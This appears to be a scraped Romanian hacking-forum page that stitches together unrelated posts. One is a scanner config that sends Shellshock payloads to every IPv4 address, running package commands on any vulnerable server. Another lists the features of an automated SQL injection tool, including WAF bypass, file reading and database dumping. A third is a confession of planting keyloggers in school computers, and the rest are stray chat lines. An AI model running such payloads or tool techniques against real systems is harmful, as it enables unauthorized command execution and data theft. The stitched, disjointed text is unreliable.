Leaderboard

Un mic tool pe care l-am scris in seara asta pentru a verifica daca un site e vulnerabil la CVE-2014-6271/CVE-2014-7169. Am I vulnerable to Shellshock / Bash bug? - Dragos Gaftoneanu

#InfoSec good dead fairy #Original from shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html) target = 0.0.0.0/0 port = 80 banners = true http-user-agent = InfosecFairy http-header = Cookie:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y http-header = Host:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y http-header = Referer:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y Using bashbug to patch bashbug

Eu am fost mate-info intentiv informatica la liceul cu cele mai multe pretentii din orasul meu,eram atras de calculatoare insa nu si de partea de codare cum nu sunt nici acum,am facut c++ si am inceput sa invat sa scriu programul mecanic fara noima,cand ma scotea profesoara la tabla il faceam perfect,mai tarziu realizand ca nu m-a ajutat cu nimic. De ce ? Pentru ca nu sunt atras de codarea de nici un fel si am stagnat acolo la calcularea unei variabile de 2 bani si la regula de 3 simpla,daca faci asta doar ca ti se "cool" sau ca ai auzit ca nu stiu ce baiat a ajuns programator la o firma mare si te gandesti doar la viitor ca bani,in mare parte vei da gres si te vei lovi pe la varsta de 20 si ceva de ani tare de tot cu capul de lucruri complexe pe care uneori e necesar sa le finisezi in timp scurt si atunci daca nu le mananci pe paine va fi vai si amar . Exemplu pozitiv : Coleg de banca 12 ani (gimnaziu + liceu ) la fel de atras de calculatoare de mic ca si mine a progresat enorm toate limbajele populare de programare la nivel 7/10 ( senior ) si munceste in Bucuresti pe un salariu foarte bun pentru Romania la o firma internationala unde poate avansa in grad de la proiect la proiect . Exemplu negativ : EU , el cand invata in clasa c++ singur,eu faceam site-uri porno si de muzica ca sa am bani de tigari si sa fiu "baiat" in fata altora,bagam keyloggere in calculatoarele din liceu (asta pana m-a pus sa matur curtea scolii intr-o toamna tarzie ca sa nu ma exmatriculeze ) mai tarziu facand alte prostii mai grave . Aveam aceelasi tip de statut social,aceleasi hobby-uri . Nu o spun sub forma de gluma,eu regret ca mi-am pierdut timpul facand prostii pe care nu le mai pot remedia si le trag dupa mine relativ toata viata traind in Romania (avand cazier si anumite interziceri inca cativa ani ) Asa ca dupa lectia de viata pe care ne-a dat-o tuturor @M2G , m-am dat exemplu negativ . Ca un rezumat daca nu esti atras de asa ceva nu te baga,doar ca l-ai vazut pe vreun blackhat la stirile ProTV ca a spart nu stiu ce site important si ti se pare wow sau crezand ca tastand la misto si copiind parti ale scripturi de pe net vei ajunge programator. Ai mintea inca frageda,daca in sufletul tau vrei cu adevarat sa devii programator,ramai pe profilul asta si invata matematica si informatica sa ai numai de 10 Edit: SA FII 100% sigur ca nici din facultate nu iesi programator,vei avea doar o diploma...asta pana la proba contrarie

Am mers dupa regula primul venit, primul servit, fara suparare @Ganav, nu mai aveam decat doua. Mai am unul la Gun Monkeys. Ai nevoie?

Merci...

Da nu m-am uitat la data:))

# jsSql Injection # Automated Mysql injection ,Web based tool # Injectii suportate: [+] Union based [+] Error based # Caracteristici Union Based Detectarea automata a keywordului si a tipului de date String/Integer Se foloseste de eroarea "You have a error in your sintax" pentru a obtine numarul de coloane in numai un request Poate numara coloanele cu Order by sau group by Poate numara coloanele direct in union ( union select 1 ; union select 1,2 ; union select 1,2,3; etc...) Poate incerca si JOIN sintax pentru virgula bypass Poate extrage Baze de de date , Tabele, Coloane,Date prin Dump in one shot sau benchmark In cazul in care cele de sus nu merg poate extrage Baze de date ,tabele ,coloane,date cu Limit x,1 Se poate selecta un fisier unde sa faca DUMP Poate citi fisiere prin load_file Se poate executa propria sintaxa SELECT Prin intermediul unei liste cu cele mai comune tabele si coloane poate ghici unele , in cazul in care nu exista information_schema # Caracteristici Error Based Incearca 3 sintaxe diferite ,se poate seta de la setari o a patra sintaxa pentru order by injection Extrage Baze de de date , Tabele, Coloane,Date Se poate selecta un fisier unde sa faca DUMP Prin intermediul unuei liste cu cele mai comune tabele si coloane poate ghici unele ,in cazul in care nu exista information_schema # Alte caracteristici si optiuni: [+] O functie pentru WAF Bypass ce foloseste /*!12345 */ + url encode + + () urlencoded [+] Un admin panel finder cu 10 threaduri [+] %Inject% pentru a indica locul unde sa injecteze ex: site.com/script.php?id=1%Inject%&parametru_non_vulnerabil sau cand trebuie pus ) in fata ex: site.com/script.php?id=1)%Inject%&parametru_non_vulnerabil sau cand este nevoie de " in loc de ' site.com/script.php?id=1"%Inject%&parametru_non_vulnerabil [+] Load_file fuzzer (impreuna cu o lista aflata in fisierul base.js poate ghici fisierele aflate pe server , daca scriptul ruleaza pe un user cu file_priv=Y) Fisiere: index.html base.js s.php s2.php keywords.php admin_p.html